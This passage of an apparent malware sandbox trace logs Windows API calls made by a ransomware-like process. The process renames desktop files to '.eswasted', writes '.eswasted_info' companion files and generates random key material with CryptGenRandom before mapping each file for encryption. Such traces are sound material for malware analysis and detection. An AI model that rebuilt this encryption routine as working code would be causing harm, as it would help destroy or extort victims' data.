lpDistanceToMoveHigh=0x0) returned 0x0 [0071.896] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0071.896] lstrcpyW (in: lpString1=0x4e141c, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0071.896] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2Gh-sG0PGI\\kSkyU4WWSeewwIe\\5HdVev6ab9mGSD4Qk.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\2gh-sg0pgi\\kskyu4wwseewwie\\5hdvev6ab9mgsd4qk.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2Gh-sG0PGI\\kSkyU4WWSeewwIe\\5HdVev6ab9mGSD4Qk.wav.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\2gh-sg0pgi\\kskyu4wwseewwie\\5hdvev6ab9mgsd4qk.wav.eswasted")) returned 1 [0071.896] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2Gh-sG0PGI\\kSkyU4WWSeewwIe\\5HdVev6ab9mGSD4Qk.wav.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\2gh-sg0pgi\\kskyu4wwseewwie\\5hdvev6ab9mgsd4qk.wav.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x100 [0071.943] CreateFileMappingW (hFile=0x100, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xf8 [0071.944] GetFileSize (in: hFile=0x100, lpFileSizeHigh=0x111fdd4 | out: lpFileSizeHigh=0x111fdd4*=0x0) returned 0xe6ab [0071.944] MapViewOfFile (hFileMappingObject=0xf8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xe6ab) returned 0x2d0000 [0071.944] CloseHandle (hObject=0x100) returned 1 [0071.947] CryptAcquireContextW (in: phProv=0x111fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fdc4*=0x4e5ff0) returned 1 [0071.948] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4f00b8 | out: pbBuffer=0x4f00b8) returned 1 [0071.948] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0071.948] CryptAcquireContextW (in: phProv=0x111fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fb2c*=0x4e5ff0) returned 1 [0071.949] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x111fb48 | out: pbBuffer=0x111fb48) returned 1 [0071.949] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0071.957] SetEndOfFile (hFile=0xfc) returned 1 [0071.960] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e9fd8 | out: hHeap=0x4a0000) returned 1 [0071.960] CloseHandle (hObject=0xfc) returned 1 [0071.961] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e1368 | out: hHeap=0x4a0000) returned 1 [0071.961] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ed708 | out: hHeap=0x4a0000) returned 1 [0071.961] CryptAcquireContextW (in: phProv=0x111fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fe0c*=0x4e5ff0) returned 1 [0071.962] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x111fe48 | out: pbBuffer=0x111fe48) returned 1 [0071.962] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0071.962] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2Gh-sG0PGI\\kSkyU4WWSeewwIe\\CZjVkwLyT8Uln.odt") returned 86 [0071.962] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2b6) returned 0x4e1ab8 [0071.962] lstrcpyW (in: lpString1=0x4e1b64, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0071.962] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4e9fd8 [0071.962] CryptAcquireContextW (in: phProv=0x111fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fde8*=0x4e5ff0) returned 1 [0071.963] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4e9fd8 | out: pbBuffer=0x4e9fd8) returned 1 [0071.963] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0071.963] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2Gh-sG0PGI\\kSkyU4WWSeewwIe\\CZjVkwLyT8Uln.odt.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\2gh-sg0pgi\\kskyu4wwseewwie\\czjvkwlyt8uln.odt.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0071.963] WriteFile (in: hFile=0xfc, lpBuffer=0x4e9fd8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x111fe04, lpOverlapped=0x0 | out: lpBuffer=0x4e9fd8*, lpNumberOfBytesWritten=0x111fe04*=0xa46, lpOverlapped=0x0) returned 1 [0071.964] SetEndOfFile (hFile=0xfc) returned 1 [0071.964] SetFilePointer (in: hFile=0xfc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.964] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e9fd8 | out: hHeap=0x4a0000) returned 1 [0071.964] lstrcpyW (in: lpString1=0x4e1b64, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0071.964] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2Gh-sG0PGI\\kSkyU4WWSeewwIe\\CZjVkwLyT8Uln.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\2gh-sg0pgi\\kskyu4wwseewwie\\czjvkwlyt8uln.odt"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2Gh-sG0PGI\\kSkyU4WWSeewwIe\\CZjVkwLyT8Uln.odt.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\2gh-sg0pgi\\kskyu4wwseewwie\\czjvkwlyt8uln.odt.eswasted")) returned 1 [0071.965] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2Gh-sG0PGI\\kSkyU4WWSeewwIe\\CZjVkwLyT8Uln.odt.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\2gh-sg0pgi\\kskyu4wwseewwie\\czjvkwlyt8uln.odt.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0071.965] CreateFileMappingW (hFile=0xf8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x100 [0071.965] GetFileSize (in: hFile=0xf8, lpFileSizeHigh=0x111fdd4 | out: lpFileSizeHigh=0x111fdd4*=0x0) returned 0xf700 [0071.965] MapViewOfFile (hFileMappingObject=0x100, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xf700) returned 0x2d0000 [0071.965] CloseHandle (hObject=0xf8) returned 1 [0071.969] CryptAcquireContextW (in: phProv=0x111fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fdc4*=0x4e5ff0) returned 1 [0071.969] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4ed750 | out: pbBuffer=0x4ed750) returned 1 [0071.969] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0071.970] CryptAcquireContextW (in: phProv=0x111fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fb2c*=0x4e5ff0) returned 1 [0071.970] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x111fb48 | out: pbBuffer=0x111fb48) returned 1 [0071.970] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0071.979] SetEndOfFile (hFile=0xfc) returned 1 [0071.981] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e9fd8 | out: hHeap=0x4a0000) returned 1 [0071.981] CloseHandle (hObject=0xfc) returned 1 [0071.982] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e1ab8 | out: hHeap=0x4a0000) returned 1 [0071.982] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4eda30 | out: hHeap=0x4a0000) returned 1 [0071.983] CryptAcquireContextW (in: phProv=0x111fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fe0c*=0x4e5ff0) returned 1 [0071.983] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x111fe48 | out: pbBuffer=0x111fe48) returned 1 [0071.983] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0071.983] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2Gh-sG0PGI\\kSkyU4WWSeewwIe\\DGPHMC5Hyb Wz.avi") returned 86 [0071.983] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2b6) returned 0x4e1ab8 [0071.983] lstrcpyW (in: lpString1=0x4e1b64, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0071.983] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4e9fd8 [0071.983] CryptAcquireContextW (in: phProv=0x111fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fde8*=0x4e5ff0) returned 1 [0071.984] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4e9fd8 | out: pbBuffer=0x4e9fd8) returned 1 [0071.984] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0071.984] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2Gh-sG0PGI\\kSkyU4WWSeewwIe\\DGPHMC5Hyb Wz.avi.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\2gh-sg0pgi\\kskyu4wwseewwie\\dgphmc5hyb wz.avi.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0071.985] WriteFile (in: hFile=0xfc, lpBuffer=0x4e9fd8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x111fe04, lpOverlapped=0x0 | out: lpBuffer=0x4e9fd8*, lpNumberOfBytesWritten=0x111fe04*=0xa46, lpOverlapped=0x0) returned 1 [0071.985] SetEndOfFile (hFile=0xfc) returned 1 [0071.986] SetFilePointer (in: hFile=0xfc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.986] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e9fd8 | out: hHeap=0x4a0000) returned 1 [0071.986] lstrcpyW (in: lpString1=0x4e1b64, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0071.986] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2Gh-sG0PGI\\kSkyU4WWSeewwIe\\DGPHMC5Hyb Wz.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\2gh-sg0pgi\\kskyu4wwseewwie\\dgphmc5hyb wz.avi"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2Gh-sG0PGI\\kSkyU4WWSeewwIe\\DGPHMC5Hyb Wz.avi.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\2gh-sg0pgi\\kskyu4wwseewwie\\dgphmc5hyb wz.avi.eswasted")) returned 1 [0071.986] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2Gh-sG0PGI\\kSkyU4WWSeewwIe\\DGPHMC5Hyb Wz.avi.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\2gh-sg0pgi\\kskyu4wwseewwie\\dgphmc5hyb wz.avi.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x100 [0071.986] CreateFileMappingW (hFile=0x100, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xf8 [0071.986] GetFileSize (in: hFile=0x100, lpFileSizeHigh=0x111fdd4 | out: lpFileSizeHigh=0x111fdd4*=0x0) returned 0x114f8 [0071.986] MapViewOfFile (hFileMappingObject=0xf8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x114f8) returned 0xb10000 [0071.987] CloseHandle (hObject=0x100) returned 1 [0072.038] CryptAcquireContextW (in: phProv=0x111fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fdc4*=0x4e5ff0) returned 1 [0072.038] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4d91f0 | out: pbBuffer=0x4d91f0) returned 1 [0072.038] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.038] CryptAcquireContextW (in: phProv=0x111fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fb2c*=0x4e5ff0) returned 1 [0072.039] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x111fb48 | out: pbBuffer=0x111fb48) returned 1 [0072.039] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.047] SetEndOfFile (hFile=0xfc) returned 1 [0072.049] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0072.049] CloseHandle (hObject=0xfc) returned 1 [0072.051] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e1ab8 | out: hHeap=0x4a0000) returned 1 [0072.051] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4edb38 | out: hHeap=0x4a0000) returned 1 [0072.051] CryptAcquireContextW (in: phProv=0x111fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fe0c*=0x4e5ff0) returned 1 [0072.052] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x111fe48 | out: pbBuffer=0x111fe48) returned 1 [0072.052] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.052] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2Gh-sG0PGI\\kSkyU4WWSeewwIe\\s4PsFcD4H t0uBBtXHVF.csv") returned 93 [0072.053] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2c4) returned 0x4e1ab8 [0072.053] lstrcpyW (in: lpString1=0x4e1b72, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0072.053] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4ec5f8 [0072.053] CryptAcquireContextW (in: phProv=0x111fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fde8*=0x4e5ff0) returned 1 [0072.053] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4ec5f8 | out: pbBuffer=0x4ec5f8) returned 1 [0072.054] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.054] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2Gh-sG0PGI\\kSkyU4WWSeewwIe\\s4PsFcD4H t0uBBtXHVF.csv.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\2gh-sg0pgi\\kskyu4wwseewwie\\s4psfcd4h t0ubbtxhvf.csv.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0072.054] WriteFile (in: hFile=0xfc, lpBuffer=0x4ec5f8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x111fe04, lpOverlapped=0x0 | out: lpBuffer=0x4ec5f8*, lpNumberOfBytesWritten=0x111fe04*=0xa46, lpOverlapped=0x0) returned 1 [0072.055] SetEndOfFile (hFile=0xfc) returned 1 [0072.055] SetFilePointer (in: hFile=0xfc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.055] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0072.055] lstrcpyW (in: lpString1=0x4e1b72, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0072.055] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2Gh-sG0PGI\\kSkyU4WWSeewwIe\\s4PsFcD4H t0uBBtXHVF.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\2gh-sg0pgi\\kskyu4wwseewwie\\s4psfcd4h t0ubbtxhvf.csv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2Gh-sG0PGI\\kSkyU4WWSeewwIe\\s4PsFcD4H t0uBBtXHVF.csv.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\2gh-sg0pgi\\kskyu4wwseewwie\\s4psfcd4h t0ubbtxhvf.csv.eswasted")) returned 1 [0072.056] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2Gh-sG0PGI\\kSkyU4WWSeewwIe\\s4PsFcD4H t0uBBtXHVF.csv.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\2gh-sg0pgi\\kskyu4wwseewwie\\s4psfcd4h t0ubbtxhvf.csv.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0072.056] CreateFileMappingW (hFile=0xf8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x100 [0072.056] GetFileSize (in: hFile=0xf8, lpFileSizeHigh=0x111fdd4 | out: lpFileSizeHigh=0x111fdd4*=0x0) returned 0x1284 [0072.056] MapViewOfFile (hFileMappingObject=0x100, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1284) returned 0x2d0000 [0072.056] CloseHandle (hObject=0xf8) returned 1 [0072.058] CryptAcquireContextW (in: phProv=0x111fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fdc4*=0x4e5ff0) returned 1 [0072.058] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4d91f0 | out: pbBuffer=0x4d91f0) returned 1 [0072.058] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.059] CryptAcquireContextW (in: phProv=0x111fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fb2c*=0x4e5ff0) returned 1 [0072.059] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x111fb48 | out: pbBuffer=0x111fb48) returned 1 [0072.059] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.067] SetEndOfFile (hFile=0xfc) returned 1 [0072.070] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0072.070] CloseHandle (hObject=0xfc) returned 1 [0072.071] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e1ab8 | out: hHeap=0x4a0000) returned 1 [0072.071] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4edd50 | out: hHeap=0x4a0000) returned 1 [0072.071] CryptAcquireContextW (in: phProv=0x111fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fe0c*=0x4e5ff0) returned 1 [0072.072] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x111fe48 | out: pbBuffer=0x111fe48) returned 1 [0072.072] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.072] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2Gh-sG0PGI\\o_rjZ7.bmp") returned 63 [0072.072] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x288) returned 0x4d8aa8 [0072.072] lstrcpyW (in: lpString1=0x4d8b26, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0072.072] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4ec5f8 [0072.072] CryptAcquireContextW (in: phProv=0x111fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fde8*=0x4e5ff0) returned 1 [0072.073] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4ec5f8 | out: pbBuffer=0x4ec5f8) returned 1 [0072.073] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.073] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2Gh-sG0PGI\\o_rjZ7.bmp.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\2gh-sg0pgi\\o_rjz7.bmp.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x100 [0072.146] WriteFile (in: hFile=0x100, lpBuffer=0x4ec5f8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x111fe04, lpOverlapped=0x0 | out: lpBuffer=0x4ec5f8*, lpNumberOfBytesWritten=0x111fe04*=0xa46, lpOverlapped=0x0) returned 1 [0072.147] SetEndOfFile (hFile=0x100) returned 1 [0072.147] SetFilePointer (in: hFile=0x100, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.147] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0072.147] lstrcpyW (in: lpString1=0x4d8b26, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0072.147] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2Gh-sG0PGI\\o_rjZ7.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\2gh-sg0pgi\\o_rjz7.bmp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2Gh-sG0PGI\\o_rjZ7.bmp.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\2gh-sg0pgi\\o_rjz7.bmp.eswasted")) returned 1 [0072.148] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2Gh-sG0PGI\\o_rjZ7.bmp.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\2gh-sg0pgi\\o_rjz7.bmp.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0072.148] CreateFileMappingW (hFile=0xfc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xf8 [0072.149] GetFileSize (in: hFile=0xfc, lpFileSizeHigh=0x111fdd4 | out: lpFileSizeHigh=0x111fdd4*=0x0) returned 0x17974 [0072.149] MapViewOfFile (hFileMappingObject=0xf8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x17974) returned 0xb10000 [0072.149] CloseHandle (hObject=0xfc) returned 1 [0072.153] CryptAcquireContextW (in: phProv=0x111fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fdc4*=0x4e5ff0) returned 1 [0072.154] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4d91f0 | out: pbBuffer=0x4d91f0) returned 1 [0072.154] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.154] CryptAcquireContextW (in: phProv=0x111fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fb2c*=0x4e5ff0) returned 1 [0072.155] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x111fb48 | out: pbBuffer=0x111fb48) returned 1 [0072.155] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.163] SetEndOfFile (hFile=0x100) returned 1 [0072.165] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0072.165] CloseHandle (hObject=0x100) returned 1 [0072.166] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d8aa8 | out: hHeap=0x4a0000) returned 1 [0072.166] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ede68 | out: hHeap=0x4a0000) returned 1 [0072.167] CryptAcquireContextW (in: phProv=0x111fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fe0c*=0x4e5ff0) returned 1 [0072.167] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x111fe48 | out: pbBuffer=0x111fe48) returned 1 [0072.167] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.167] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6pWu7.mp4") returned 51 [0072.167] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x270) returned 0x4e1ab8 [0072.167] lstrcpyW (in: lpString1=0x4e1b1e, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0072.167] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4ec5f8 [0072.167] CryptAcquireContextW (in: phProv=0x111fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fde8*=0x4e5ff0) returned 1 [0072.168] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4ec5f8 | out: pbBuffer=0x4ec5f8) returned 1 [0072.168] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.168] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 